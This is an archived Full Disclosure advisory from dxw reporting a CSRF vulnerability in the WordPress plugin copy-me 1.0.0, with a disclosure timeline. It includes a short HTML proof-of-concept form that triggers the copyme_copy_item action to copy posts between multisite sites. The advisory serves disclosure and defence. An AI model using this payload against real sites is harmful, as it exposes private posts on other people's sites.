lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 21 Dec 2016 19:55:34 +0000
From: dxw Security <>
Subject: [FD] copy-me vulnerable to CSRF allowing unauthenticated attacker
	to copy posts (WordPress plugin)

Software: copy-me
Version: 1.0.0
Advisory report:
CVE: Awaiting assignment
CVSS: 4.3 (Medium; AV:N/AC:M/Au:N/C:N/I:P/A:N)

copy-me vulnerable to CSRF allowing unauthenticated attacker to copy posts

This plugin does not use nonces. Copying posts could allow taking a secret post from a non-public site within a multisite installation and moving it to a public site.

Proof of concept
Click submit and it’ll copy post with ID 1 to blog/site with ID 1:
<form method=\"POST\" action=\"http://localhost/wp-admin/admin-ajax.php\">
  <input type=\"text\" name=\"action\" value=\"copyme_copy_item\">
  <input type=\"text\" name=\"id\" value=\"1\">
  <input type=\"text\" name=\"target\" value=\"1\">
  <input type=\"submit\">

Disable the plugin. No fixed version is known.

Disclosure policy
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy:

Please contact us on to acknowledge this report if you received it via a third party (for example, as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report with 14 days.


2016-11-01: Discovered
2016-12-07: Reported to vendor via contact form:
2016-12-07: Requested CVE
2016-12-21: Vendor has not responded after 14 days
2016-12-21: Published

Discovered by dxw:
Tom Adams
Please visit for more information.

Sent through the Full Disclosure mailing list
Web Archives & RSS:

Powered by blists - more mailing lists